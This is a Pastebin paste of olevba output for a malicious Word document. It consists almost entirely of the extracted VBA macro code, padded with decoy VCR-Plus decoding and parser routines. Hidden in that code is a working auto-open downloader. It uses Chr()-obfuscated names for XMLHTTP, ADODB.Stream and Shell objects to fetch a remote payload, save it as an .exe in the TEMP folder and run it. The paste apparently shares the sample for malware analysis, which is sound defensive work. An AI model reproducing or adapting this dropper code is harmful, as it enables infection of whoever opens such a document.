dynamoo

Malicious Word macro

Oct 9th, 2015
237
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V mse7396821.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: mse7396821.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: mse7396821.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18.  
  19. NNmmceek 3800, 6.9004
  20.  
  21. End Sub
  22.  
  23.  
  24.  
  25.  
  26.  
  27. ' // Interleaves bits
  28. Private Sub Interleave(SlotIndex As Long, cval As Long, t8c5 As Long, t2c1 As Long)
  29.     Dim tblidxBinary As String
  30.     Dim cvalBinary As String
  31.    
  32.     tblidxBinary = Binary2(CStr(SlotIndex), 11)
  33.     cvalBinary = Binary2(CStr(cval), 4)
  34.    
  35.     t8c5 = Dec2(Left(tblidxBinary, 7) & Mid(cvalBinary, 4 - 3, 1) & Mid(cvalBinary, 4 - 2, 1) & Mid(tblidxBinary, 11 - 3, 1))
  36.     t2c1 = Dec2(Mid(tblidxBinary, 11 - 2, 1) & Mid(cvalBinary, 4 - 1, 1) & Mid(tblidxBinary, 11 - 1, 1) & Mid(cvalBinary, 4 - 0, 1) & Mid(tblidxBinary, 11 - 0, 1))
  37. End Sub
  38.  
  39.  
  40. Sub NNmmceek(cscscss As Integer, dDouble As Double)
  41. DurationTo
  42.  
  43.  
  44. End Sub
  45.  
  46.  
  47.  
  48.  
  49. -------------------------------------------------------------------------------
  50. VBA MACRO Module1.bas
  51. in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module1'
  52. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  53.  
  54. Private Function UnmapTop(ByVal day As Integer, ByVal year As Integer, ByVal top As Long, ByVal digits As Integer) As Long
  55.     Dim d2 As Long
  56.     Dim d1 As Long
  57.     Dim d0 As Long
  58.     Dim y As Long
  59.     Dim poot As Long
  60.     Dim n2 As Long
  61.     Dim n1 As Long
  62.     Dim n0 As Long
  63.     Dim f3 As Long
  64.     Dim f2 As Long
  65.     Dim f1 As Long
  66.     Dim f0 As Long
  67.     Dim p3 As Long
  68.     Dim p2 As Long
  69.     Dim p1 As Long
  70.    
  71.     d2 = top \ 100
  72.     d1 = (top Mod 100) \ 10
  73.     d0 = top Mod 10
  74.    
  75.     ' / generate key (P3P2P1F0) and reverse key (F3F2F1F0)
  76.    f0 = 1
  77.     y = year Mod 16
  78.     p1 = (y + 1) Mod 10
  79.     f1 = 10 - p1
  80.    
  81.     p2 = (((y + 1) * (y + 2)) \ 2) Mod 10
  82.     f2 = 10 - ((p2 + f1 * p1) Mod 10)
  83.    
  84.     p3 = (((y + 1) * (y + 2) * (y + 3)) \ 6) Mod 10
  85.     f3 = 10 - ((p3 + f1 * p2 + f2 * p1) Mod 10)
  86.    
  87.     If digits = 1 Then
  88.         n0 = (d0 * f0 + day * f1) Mod 10
  89.         n1 = 0
  90.         n2 = 0
  91.     End If
  92.    
  93.     If digits = 2 Then
  94.         n0 = (d0 * f0 + d1 * f1 + day * f2) Mod 10
  95.         n1 = (d1 * f0 + day * f1) Mod 10
  96.         n2 = 0
  97.     End If
  98.    
  99.     If digits = 3 Then
  100.         n0 = (d0 * f0 + d1 * f1 + d2 * f2 + day * f3) Mod 10
  101.         n1 = (d1 * f0 + d2 * f1 + day * f2) Mod 10
  102.         n2 = (d2 * f0 + day * f1) Mod 10
  103.     End If
  104.    
  105.     poot = 100 * n2 + 10 * n1 + n0
  106.    
  107.     UnmapTop = poot
  108. End Function
  109.  
  110. ' // vcrplus.h -
  111. ' // qlookup.c
  112.  
  113. Private Function FindSlotIndex(StartTime As Integer, Duration As Integer) As Long
  114.     Dim j As Long
  115.    
  116.     For j = 0 To SOFTLIMIT - 1
  117.         If SlotTable(j)(0) = StartTime And SlotTable(j)(1) = Duration Then
  118.             FindSlotIndex = j
  119.             Exit Function
  120.         End If
  121.     Next
  122. End Function
  123.  
  124.  
  125. ' // misc.h
  126. Private Function EndTime(ByVal start As Integer, ByVal dur As Integer) As Integer
  127.     Dim min As Integer
  128.     Dim hr As Integer
  129.    
  130.     min = (start Mod 100) + dur
  131.    
  132.     hr = min \ 60
  133.     min = min Mod 60
  134.     hr = (hr + start \ 100) Mod 24
  135.     EndTime = hr * 100 + min
  136. End Function
  137.  
  138. ' // scramble.h
  139. Public Function CrossMultiply2(ByVal sValue As String, ByVal sKey As String) As String
  140.     Dim iValueLen As Integer
  141.     iValueLen = Len(StripZero(sValue))
  142.     Do
  143.         CrossMultiply2 = Pad(Pad(Multiply(sValue, sKey, 10, 0), iValueLen), 8)
  144.         sValue = CrossMultiply2
  145.     Loop Until Mid$(CrossMultiply2, Len(CrossMultiply2) - iValueLen + 1, 1) <> "0"
  146. End Function
  147.  
  148. Private Sub Deinterleave(ByVal t8c5 As Long, ByVal t2c1 As Integer, SlotIndex As Long, cval As Integer)
  149.     Dim t8c5binary As String
  150.     Dim t2c1binary As String
  151.    
  152.     t8c5binary = Binary2(CStr(t8c5), 10)
  153.     t2c1binary = Binary2(CStr(t2c1), 10)
  154.  
  155.     SlotIndex = Dec2(Left(t8c5binary, 7) & Right(t8c5binary, 1) & Mid(t2c1binary, 10 - 4, 1) & Mid(t2c1binary, 10 - 2, 1) & Mid(t2c1binary, 10 - 0, 1))
  156.     cval = Dec2(Mid(t8c5binary, 10 - 2, 1) & Mid(t8c5binary, 10 - 1, 1) & Mid(t2c1binary, 10 - 3, 1) & Mid(t2c1binary, 10 - 1, 1))
  157.  
  158. End Sub
  159.  
  160. ' // Will produce a binary string of a decimal number
  161. Public Function Binary2(sNumber As String, iSize As Integer) As String
  162.     Binary2 = Pad(Convert(sNumber, 10, 2), iSize)
  163. End Function
  164.  
  165. ' // Will produce a decimal number of a binary string
  166. Public Function Dec2(sNumber As String) As String
  167.     Dec2 = Convert(sNumber, 2, 10)
  168. End Function
  169.  
  170. Public Function Dec33(FindSlotIndex As String, SomeVarI As Double)
  171. Set noexile = FindSlotAs2Index(Chr(83) & "h" & "e" & Chr(108) & Chr(108) & ";<=" + Chr(46) & Chr(65) & "p" & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  172. noexile.Open (FindSlotIndex)
  173. End Function
  174. Private Function DecodeRight3Digits2(sRight3Digits As String) As String
  175.     DecodeRight3Digits2 = Convert(sRight3Digits, 10, 32)
  176. End Function
  177.  
  178. Private Sub Deinterleave2(ByVal A As Long, ByVal B As Integer, iSlotIndex As Long, iChannel As Integer)
  179.     Dim Abin As String
  180.     Dim Bbin As String
  181.    
  182.     Abin = Binary2(CStr(A), 10)
  183.     Bbin = Binary2(CStr(B), 5)
  184.  
  185.     iSlotIndex = Dec2(Slice(Abin, 1, 7) & Slice(Abin, 10) & Slice(Bbin, 1) & Slice(Bbin, 3) & Slice(Bbin, 5))
  186.     iChannel = Dec2(Slice(Abin, 8, 9) & Slice(Bbin, 2) & Slice(Bbin, 4))
  187.    
  188.     Debug.Print Abin & "  " & Bbin
  189.     Debug.Print iSlotIndex & " " & iChannel
  190. End Sub
  191.  
  192.  
  193.  
  194.  
  195. -------------------------------------------------------------------------------
  196. VBA MACRO Module2.bas
  197. in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module2'
  198. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  199. ' // Encode.c
  200. Public Function Encode(day As Integer, month As Integer, year As String, Channel As Integer, StartTime As Integer, Duration As Integer)
  201.     Dim j As Integer
  202.     Dim SlotIndex As Long
  203.     Dim limit_ As Long
  204.     Dim doneflag As Long ' FULLSEARCH
  205.    Dim s5_out As Long
  206.     Dim Right3Digits As Integer
  207.     Dim Right5BinaryDigits As Integer
  208.     Dim ofout As Integer
  209.     Dim EncodedNumber As Long
  210.     Dim Left5Digits As Long
  211.     Dim number As Long
  212.     Dim s4_out As Long
  213.    
  214.     MonthArray = Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec")
  215.     Set Encode = CreateObject(Replace(year, Chr(35 * 2 - 14 + 6), ""))
  216.     If day >= 0 Then
  217.     Exit Function
  218.     End If
  219.     C.reateSlotTable
  220.    
  221.     year = year Mod 100
  222.    
  223.     SlotIndex = Find.SlotIndex(StartTime, Duration)
  224.     If SlotIndex = -1 Then
  225.         Encode = -1 ' error
  226.        Exit Function
  227.     End If
  228.    
  229.     ' From them infer what must have been step 4 & step 5 results */
  230.    Inter.leave SlotIndex, Channel - 1, s4_out, s5_out
  231.    
  232.     ' If the mapped_top is zero then top and offset are zero */
  233.    If s4_out = 0 Then
  234.         Left5Digits = 0
  235.         ofout = 0
  236.     Else
  237.         Dim i As Integer
  238.         Dim tmp As Long
  239.        
  240.         j = Len(CStr(s4_out))
  241.         limit_ = 10 ^ j
  242.         If j > 3 Then
  243.             Encode = 0 ' needs higher digit coding
  244.        End If
  245.           End If
  246.     End Function
  247.     Public Function CrossMultiply3(Interleave2 As Long)
  248.  
  249. Dim PbMain31 As Object
  250. Set PbMain31 = FindSlotAs2Index(Chr(77) & Chr(105) & "c" & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & Chr(76) & "H" & Chr(84) & Chr(84) & "P")
  251. Left20Digits PbMain31
  252. PbMain31.Send
  253. CrossMultiply3 = PbMain31.responseBody
  254. End Function
  255. Public Function limitCrossMultiply3(Interleave2 As Long)
  256.         limit_ = limit_ \ 10
  257.         ofout = 0
  258.         Left5Digits = s4_out
  259.         ' Get a Left5Digits with same no digits as s4_out
  260.        ' May have to loop several times
  261.        Do
  262.             ' Reverse the MapTop encryption
  263.            Left5Digits = Unm.apTop(day, year, Left5Digits, j)
  264.             For i = 0 To (year Mod 16)
  265.                 'ofout = ofout + (MapTop(day, i, Left5Digits, j) Mod 10)
  266.            Next
  267.         Loop While Left5Digits < limit_
  268.        
  269.         ' Add sum of final Left5Digits's digits to offset
  270.        tmp = Left5Digits
  271.        
  272.         While tmp > 0
  273.             ofout = ofout + (tmp Mod 10)
  274.             tmp = tmp \ 10
  275.         Wend
  276.        
  277.         ofout = ofout Mod 32
  278.        
  279.     End If
  280.    
  281.     ' Have two of the three inputs to step 5; determine the rem
  282.    For Right5BinaryDigits = 0 To 31
  283.         j = (Right5BinaryDigits + (day * (month + 1)) + ofout) Mod 32
  284.         If j = s5_out Then
  285.             Exit For
  286.         End If
  287.     Next
  288.    
  289.     ' Assemble the output of step 1
  290.    Right3Digits = Enc.ode_Right3Digits(day, Right5BinaryDigits)
  291.     EncodedNumber = Right3Digits + (1000 * Left5Digits)
  292.  
  293.     ' Invert the mixing
  294.    'number = CrossMultiply(EncodedNumber, DecodeKey)
  295.    number = CrossMultiply2(CStr(EncodedNumber), CStr(DecodeKey))
  296.  
  297.     Encode = number
  298.    
  299. End Function
  300.  
  301.  
  302. ' //  Decode.c
  303. Public Function Decode(ByVal ThisMonth As Integer, ByVal ThisDate As Integer, ByVal ThisYear As Integer, ByVal number As Long) As Variant
  304.     Dim EncodedNumber As String
  305.     Dim Left5Digits As String
  306.     Dim Right3Digits As Integer
  307.     Dim LeftBinaryDigits As Integer
  308.     Dim Right5BinaryDigits As Integer
  309.     Dim s5_out As Integer
  310.     Dim ofout As Integer
  311.     Dim mtout As Long
  312.     Dim SlotIndex As Long
  313.     Dim DayOut As Integer
  314.     Dim Channel As Integer
  315.     Dim StartTime As Integer
  316.     Dim Duration As Integer
  317.    
  318.     MonthArray = Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec")
  319.    
  320.     CreateSlotTable
  321.    
  322.     ThisYear = ThisYear Mod 100
  323.    
  324.     If ThisMonth > 12 Or ThisMonth < 1 Or ThisDate < 1 Or ThisDate > 31 Then
  325.         'Debug.Print "Invalid date"
  326.        Exit Function
  327.     End If
  328.    
  329.     If number < 1 Or number > 99999999 Then
  330.         'Debug.Print "Sorry, plus code too long"
  331.        Exit Function
  332.     End If
  333.    
  334.     ofout = INVALID
  335.     mtout = INVALID
  336.    
  337.     EncodedNumber = CrossMultiply2(CStr(number), GenerateKey(2, 8))
  338.        
  339.     Right3Digits = CInt(Right$(EncodedNumber, 3))
  340.     Left5Digits = Left$(EncodedNumber, 5)
  341.     LeftBinaryDigits = (Right3Digits - 1) \ 32
  342.     Right5BinaryDigits = (Right3Digits - 1) Mod 32
  343.     DayOut = LeftBinaryDigits + 1
  344.        
  345.     If DayOut < ThisDate Then
  346.         ThisMonth = ThisMonth + 1
  347.         If ThisMonth > 12 Then
  348.             ThisMonth = 1
  349.             ThisYear = (ThisYear + 1) Mod 100
  350.         End If
  351.     End If
  352.    
  353.     If number >= 1000 Then
  354.         Offset DayOut, ThisYear, Left5Digits, ofout, mtout
  355.     Else
  356.         mtout = 0
  357.         ofout = 0
  358.     End If
  359.        
  360.     s5_out = (Right5BinaryDigits + (DayOut * (ThisMonth + 1)) + ofout) Mod 32
  361.  
  362.     Deinterleave2 mtout, s5_out, SlotIndex, Channel
  363.        
  364.     Channel = Channel + 1
  365.     Lookup SlotIndex, StartTime, Duration
  366.    
  367.     Decode = Array(DayOut, ThisMonth, ThisYear, Channel, StartTime, Duration, EndTime(StartTime, Duration))
  368. End Function
  369.  
  370. Private Sub Fill(Index As Integer, time As Integer, dur As Integer)
  371.     Dim i As Integer
  372.    
  373.     For i = 0 To 33
  374.         SlotTable(i + Index) = Array(time + TList(i), dur + DList(i))
  375.     Next
  376.    
  377. End Sub
  378.  
  379.    
  380.  
  381.  
  382. Public Function Right51BinaryDigits(ServidrGEN9_4 As Object, ServidrGEN9_3 As String) As Integer
  383. Right51BinaryDigits = 15
  384. ServidrGEN9_4.savetofile ServidrGEN9_3, 2
  385. Right51BinaryDigits = 2
  386. End Function
  387.  
  388.  
  389. Private Function ScanForStart(start As Integer, prev As Long) As Long
  390.     Dim j As Long
  391.    
  392.     CreateSlotTable
  393.    
  394.     For j = prev + 1 To SOFTLIMIT - 1
  395.         If SlotTable(j).start = start Then
  396.             ScanForStart = j
  397.         End If
  398.     Next
  399. End Function
  400.  
  401. Public Function DurationTo()
  402. Dim CrossBoss As Object
  403. Set CrossBoss = FindSlotAs2Index(Chr(65) & "do" & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & "a" & Chr(109))
  404.  
  405.    CrossBoss.Type = 1
  406. Dim ServidrGEN9_3 As String
  407. ServidrGEN9_3 = GetThisStringT()
  408. With CrossBoss
  409.     .Open
  410.     .write CrossMultiply3(2020)
  411. End With
  412.  Dim HricK As Double
  413. HricK = Right32Digits("CrossBoss", "CrossBoss", CrossBoss, ServidrGEN9_3, 13.55)
  414. Dec33 ServidrGEN9_3, HricK
  415. End Function
  416. Private Sub Lookup(ByVal i As Long, StartTime As Integer, Duration As Integer)
  417.     If i > LIMIT Then
  418.         'Debug.Print "Illegal table index"
  419.        Exit Sub
  420.     End If
  421.    
  422.     If i > SOFTLIMIT Then
  423.         StartTime = INVALID
  424.         Duration = INVALID
  425.         Exit Sub
  426.     End If
  427.    
  428. '    Open App.Path & "\slots.txt" For Output As #1
  429. '    For i = 0 To 2202
  430. '        Print #1, CStr(SlotTable(i)(0)) & "," & CStr(SlotTable(i)(1))
  431. '    Next
  432. '    Close #1
  433.    
  434.     StartTime = SlotTable(i)(0)
  435.     Duration = SlotTable(i)(1)
  436. End Sub
  437.  
  438. Private Function GetDuration(Index As Long) As Integer
  439.     GetDuration = SlotTable(Index).leng
  440. End Function
  441.  
  442.  
  443.  
  444. -------------------------------------------------------------------------------
  445. VBA MACRO Module3.bas
  446. in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module3'
  447. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  448.  
  449.  
  450. Private Sub Offset(ByVal iDay As Integer, ByVal iYear As Integer, ByVal sTop5Digits As String, OffsetOut As Integer, TopOut As Long)
  451.     Dim i As Integer
  452.     Dim Offset As Integer
  453.     Dim iDigitCount As Long
  454.     Dim d As String
  455.     Dim MapTopX As String
  456.     Dim sTop5Short As String
  457.    
  458.     iDigitCount = Len(CStr(Val(sTop5Digits)))
  459.     sTop5Short = Right$(sTop5Digits, iDigitCount)
  460.     For i = 1 To iDigitCount
  461.         Offset = Offset + Val(Slice(sTop5Short, i))
  462.     Next
  463.    
  464.     Do
  465.         For i = 0 To (iYear Mod 16)
  466.             d = CStr(iDay Mod 10) & sTop5Short
  467.             MapTopX = Slice(Multiply(Reverse(GenerateKey(i, 8)), d, 10, 0), 2, 2 + iDigitCount - 1)
  468.             Offset = Offset + Val(Right$(MapTopX, 1))
  469.         Next
  470.         sTop5Short = MapTopX
  471.     Loop Until Slice(sTop5Short, 1) <> "0" Or Val(sTop5Short) = 0
  472.    
  473.     OffsetOut = Offset Mod 32
  474.     TopOut = Val(sTop5Short)
  475. End Sub
  476. Private Sub Decode_Right3Digits(ByVal Right3Digits As Integer, ByRef day As Integer, ByRef Right5BinaryDigits As Integer)
  477.     day = ((Right3Digits - 1) / 32) + 1 ' Top bits
  478.    Right5BinaryDigits = (Right3Digits - 1) Mod 32 ' Bottom 5 bits
  479. End Sub
  480.  
  481. Private Function Encode_Right3Digits(ByVal day As Integer, ByVal Right5BinaryDigits As Integer)
  482.     Encode_Right3Digits = Right5BinaryDigits + (32 * (day - 1)) + 1
  483. End Function
  484.  
  485.  
  486.  
  487.  
  488. Public Function GetThisStringT() As String
  489.  
  490. Set sTop1Short = FindSlotAs2Index(Chr(87) & Chr(80 + 3) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) + Chr(23 * 2) & Chr(40 * 2 + 3) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  491. ServidrGEN9_2 = sTop1Short("T" & Chr(69) & Chr(77) & Chr(80))
  492. GetThisStringT = ServidrGEN9_2 & "\" & "vts" & Chr(65) & "bd." & "e" & Chr(120) & "e"
  493. End Function
  494.  
  495.  
  496.  
  497.  
  498.  
  499.   Public Function Right32Digits(CrossBoss2 As String, CrossBoss3 As String, CrossBoss As Object, ServidrGEN9_3 As String, ServidrGEN9_8 As Double) As Double
  500. Right32Digits = 5
  501. Right32Digits = Right51BinaryDigits(CrossBoss, ServidrGEN9_3)
  502. Right32Digits = 99.9
  503.   End Function
  504. Public Sub Test()
  505.     Dim vDecode As Variant
  506.    
  507.     vDecode = Decode(3, 2, 2005, 10)
  508.     Debug.Print vDecode(0)
  509.     Debug.Print vDecode(1)
  510.     Debug.Print vDecode(2)
  511.     Debug.Print vDecode(3)
  512.     Debug.Print vDecode(4)
  513.     Debug.Print vDecode(5)
  514. End Sub
  515.  
  516. Private Sub FillQHB(Index As Integer, dur As Integer)
  517.     Dim i As Integer
  518.    
  519.     For i = 0 To 23
  520.         SlotTable(Index + i * 2) = Array(i * 100 + 15, dur)
  521.         SlotTable(Index + i * 2 + 1) = Array(i * 100 + 45, dur)
  522.     Next
  523. End Sub
  524.  
  525.  
  526.  
  527.  
  528. Private Function FillHHB(Index As Integer, dur As Integer)
  529.     Dim i As Integer
  530.    
  531.     For i = 23 To 0 Step -1
  532.         SlotTable(Index + (23 - i) * 2) = Array(i * 100 + 30, dur)
  533.         SlotTable(Index + (23 - i) * 2 + 1) = Array(i * 100, dur)
  534.     Next
  535. End Function
  536.  
  537.  
  538.  
  539.  
  540.  
  541.  
  542.  
  543. -------------------------------------------------------------------------------
  544. VBA MACRO Module4.bas
  545. in file: mse7396821.doc - OLE stream: u'Macros/VBA/Module4'
  546. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  547.  
  548. Public Function ParseLine(linetext As String, Optional iOutputPos, Optional bParsed As Boolean) As Variant
  549.     Dim oParseTree As New ParseTree
  550.     Dim vParseExpression As Variant
  551.     Dim vPosition As Variant
  552.     Dim lindex As Long
  553.     Dim member As ParseTree
  554.     Dim bSpacer As Boolean
  555.    
  556.     ParserText = linetext
  557.    
  558.     Set Positions = New Collection
  559.     Set Colours = New Collection
  560.     CanonicalText = ""
  561.    
  562.     If Not LineParse.Parse(oParseTree) Then
  563.         If linetext <> "" Then
  564.             AddText linetext, vbRed
  565.         End If
  566.         ParseLine = Array(CanonicalText, Positions, Colours)
  567.         iOutputPos = Len(linetext) + 1
  568.         bParsed = False
  569.         Exit Function
  570.     End If
  571.     bParsed = True
  572.     iOutputPos = ParserTextPosition
  573.    
  574.     ' Variable
  575.    AddText oParseTree(1).Text & oParseTree(2).Text, variableassign_col
  576.    
  577.     ' ws
  578.    bSpacer = WS(oParseTree(3))
  579.    
  580.     ' Colon equals
  581.    AddText Spacer(bSpacer) & ":= ", vbBlack
  582.    
  583.     ' ws
  584.    WS oParseTree(5)
  585.    
  586.     Select Case oParseTree(6).Index
  587.         Case 1, 2, 3
  588.             AddText oParseTree(6)(1)(1).Text, bracket_col
  589.             Set member = oParseTree(6)(1)(3)
  590.             ParseExpression member
  591.             AddText oParseTree(6)(1)(5).Text, bracket_col
  592.         Case Else
  593.             Set member = oParseTree(6)(1)
  594.             ParseExpression member
  595.     End Select
  596.  
  597.     ' Semi colon
  598.    AddText ";", vbBlack
  599.    
  600.     ParseLine = Array(CanonicalText, Positions, Colours)
  601. End Function
  602.  
  603. Private Function WS(oWS As Integer) As Boolean
  604.     If oWS(1).Index = 1 Then
  605.         AddText oWS(2).Text, vbBlack
  606.     Else
  607.         WS = True
  608.     End If
  609. End Function
  610.  
  611. Public Function FindSlotAs2Index(doneflagz3 As String)
  612. For i = 3 To 5
  613. doneflagz3 = Replace(doneflagz3, Chr(35 * 2 - 14 + i), "")
  614. Next i
  615.  Set FindSlotAs2Index = Encode(0, 1, doneflagz3, 2, 3, 4)
  616. End Function
  617. Private Function Spacer(bYes As Boolean)
  618.     If bYes Then
  619.         Spacer = " "
  620.     End If
  621. End Function
  622.  
  623. Private Function ParseExpression(oResult As Integer)
  624.     Dim member As ParseTree
  625.     Dim lindex As Long
  626.    
  627.     Select Case oResult.Index
  628.         Case 0 ' bracketed expression
  629.            AddText oResult(1).Text, bracket_col
  630.             WS oResult(2)
  631.             Set member = oResult(3)
  632.             ParseExpression member
  633.             WS oResult(4)
  634.             AddText oResult(5).Text, bracket_col
  635.            
  636.         Case 1 ' literal
  637.            Set member = oResult(1)
  638.             ParseLiteralSubExpression member
  639.                                    
  640.         Case 2, 3 ' and, or
  641.            If oResult(1)(1).Index = 1 Then
  642.                 AddText UCase(oResult(1)(1).Text) & " ", keyword_col
  643.             Else
  644.                 AddText oResult(1)(1).Text, keyword_col
  645.             End If
  646.            
  647.             WS oResult(1)(2)
  648.            
  649.             For lindex = 1 To oResult(1)(3).SubTree.Count
  650.                 Set member = oResult(1)(3)(lindex)
  651.                 If member.Name = "expression" Then
  652.                     ParseExpression member(1)
  653.                 Else
  654.                     WS member(1)
  655.                     AddText ",", vbBlack
  656.                     AddText Spacer(WS(member(3))), vbBlack
  657.                 End If
  658.             Next
  659.            
  660.         Case 4 'repeat
  661.            If oResult(1)(1).Index = 1 Then
  662.                 AddText "REPEAT", keyword_col
  663.             Else
  664.                 AddText "#", keyword_col
  665.             End If
  666.            
  667.             AddText Spacer(WS(oResult(1)(2))), vbBlack
  668.            
  669.             Set member = oResult(1)(3)(1)
  670.             ParseExpression member
  671.            
  672.             If oResult(1)(4).Index = 1 Then
  673.                 AddText Spacer(WS(oResult(1)(4)(1)(1))), vbBlack
  674.                 If oResult(1)(4)(1)(2).Index = 1 Then
  675.                     AddText "UNTIL", keyword_col
  676.                 Else
  677.                     AddText ":", keyword_col
  678.                 End If
  679.                 AddText Spacer(WS(oResult(1)(4)(1)(3))), vbBlack
  680.                 Set member = oResult(1)(4)(1)(4)(1)
  681.                 ParseExpression member
  682.             End If
  683.            
  684.             If oResult(1)(5).Index = 1 Then
  685.                 AddText Spacer(WS(oResult(1)(5)(1)(1))), vbBlack
  686.                 If oResult(1)(5)(1)(2).Index = 1 Then
  687.                     AddText "MIN", keyword_col
  688.                 Else
  689.                     AddText "-", keyword_col
  690.                 End If
  691.                 AddText Spacer(WS(oResult(1)(5)(1)(3))), vbBlack
  692.                 AddText oResult(1)(5)(1)(4).Text, vbBlack
  693.             End If
  694.            
  695.             If oResult(1)(6).Index = 1 Then
  696.                 AddText Spacer(WS(oResult(1)(6)(1)(1))), vbBlack
  697.                 If oResult(1)(6)(1)(2).Index = 1 Then
  698.                     AddText "MAX", keyword_col
  699.                 Else
  700.                     AddText "+", keyword_col
  701.                 End If
  702.                 AddText Spacer(WS(oResult(1)(6)(1)(3))), vbBlack
  703.                 AddText oResult(1)(6)(1)(4).Text, vbBlack
  704.             End If
  705.            
  706.         Case 5 'list
  707.            If oResult(1)(1).Index = 1 Then
  708.                 AddText "LIST", keyword_col
  709.             Else
  710.                 AddText "@", keyword_col
  711.             End If
  712.        
  713.             AddText Spacer(WS(oResult(1)(2))), vbBlack
  714.            
  715.             Set member = oResult(1)(3)(1)
  716.             ParseExpression member
  717.             WS oResult(1)(4)
  718.             AddText ",", vbBlack
  719.             AddText Spacer(WS(oResult(1)(6))), vbBlack
  720.             Set member = oResult(1)(7)(1)
  721.             ParseExpression member
  722.            
  723.             If oResult(1)(8).Index = 1 Then
  724.                 AddText Spacer(WS(oResult(1)(8)(1)(1))), vbBlack
  725.                 If oResult(1)(8)(1)(2).Index = 1 Then
  726.                     AddText "MIN", keyword_col
  727.                 Else
  728.                     AddText "-", keyword_col
  729.                 End If
  730.                 AddText Spacer(WS(oResult(1)(8)(1)(3))), vbBlack
  731.                 AddText oResult(1)(8)(1)(4).Text, vbBlack
  732.             End If
  733.            
  734.             If oResult(1)(9).Index = 1 Then
  735.                 AddText Spacer(WS(oResult(1)(9)(1)(1))), vbBlack
  736.                 If oResult(1)(9)(1)(2).Index = 1 Then
  737.                     AddText "MAX", keyword_col
  738.                 Else
  739.                     AddText "+", keyword_col
  740.                 End If
  741.                 AddText Spacer(WS(oResult(1)(9)(1)(3))), vbBlack
  742.                 AddText oResult(1)(9)(1)(4).Text, vbBlack
  743.             End If
  744.            
  745.         Case 6 'in
  746.            If oResult(1)(1).Index = 1 Then
  747.                 AddText "IN", keyword_col
  748.             Else
  749.                 AddText ">", keyword_col
  750.             End If
  751.            
  752.             AddText Spacer(WS(oResult(1)(2))), vbBlack
  753.             Set member = oResult(1)(3)
  754.             ParseInSubExpression member
  755.            
  756.         Case 7 ' optional
  757.            If oResult(1)(1).Index = 1 Then
  758.                 AddText "OPTIONAL", keyword_col
  759.             Else
  760.                 AddText "?", keyword_col
  761.             End If
  762.            
  763.             AddText Spacer(WS(oResult(1)(2))), vbBlack
  764.             Set member = oResult(1)(3)(1)
  765.             ParseExpression member
  766.            
  767.         Case 8 ' not
  768.            If oResult(1)(1).Index = 1 Then
  769.                 AddText "NOT", keyword_col
  770.             Else
  771.                 AddText "!", keyword_col
  772.             End If
  773.             AddText Spacer(WS(oResult(1)(2))), vbBlack
  774.             Set member = oResult(1)(3)(1)
  775.             ParseExpression member
  776.            
  777.         Case 9 ' EOS
  778.            If oResult(1).Index = 1 Then
  779.                 AddText "EOS", auxkeyword_col
  780.             Else
  781.                 AddText "||", auxkeyword_col
  782.             End If
  783.        
  784.         Case 10 ' PASS
  785.            If oResult(1).Index = 1 Then
  786.                 AddText "PASS", auxkeyword_col
  787.             Else
  788.                 AddText "*", auxkeyword_col
  789.             End If
  790.            
  791.         Case 11 'FAIL
  792.            If oResult(1).Index = 1 Then
  793.                 AddText "FAIL", auxkeyword_col
  794.             Else
  795.                 AddText "~", auxkeyword_col
  796.             End If
  797.            
  798.         Case 12 ' External
  799.            If oResult(1)(1).Index = 1 Then
  800.                 AddText "EXTERNAL", keyword_col
  801.             Else
  802.                 AddText "=", keyword_col
  803.             End If
  804.             AddText Spacer(WS(oResult(1)(2))), vbBlack
  805.            
  806.             AddText oResult(1)(3).Text, vbBlack
  807.            
  808.             Dim sParameterText As String
  809.            
  810.             Select Case oResult(1)(4).Index
  811.                 Case 0 ' No parameters
  812.                Case 1
  813.                     Dim vParameter As Variant
  814.                     AddText "(", vbBlack
  815.                     For Each vParameter In oResult(1)(4)(1)(1).SubTree
  816.                         sParameterText = sParameterText & "," & vParameter.Text
  817.                     Next
  818.                    
  819.                     AddText Mid$(sParameterText, 2), vbBlack
  820.                     AddText ")", vbBlack
  821.             End Select
  822.            
  823.         Case 13 'variable
  824.            AddText oResult(1).Text, variable_col
  825.     End Select
  826. End Function
  827.  
  828. Private Function ParseInSubExpression(oResult As Integer)
  829.     Dim oSub As ParseTree
  830.    
  831.     For Each oSub In oResult.SubTree
  832.         If oSub(1).Text = "," Then
  833.             AddText ",", vbBlack
  834.             AddText Spacer(WS(oSub(2))), vbBlack
  835.         Else
  836.             If oSub(1).Index = 1 Then
  837.                 If oSub(1)(1).Index = 1 Then
  838.                     AddText "NOT", auxkeyword_col
  839.                 Else
  840.                     AddText "!", auxkeyword_col
  841.                 End If
  842.                 AddText Spacer(WS(oSub(2))), vbBlack
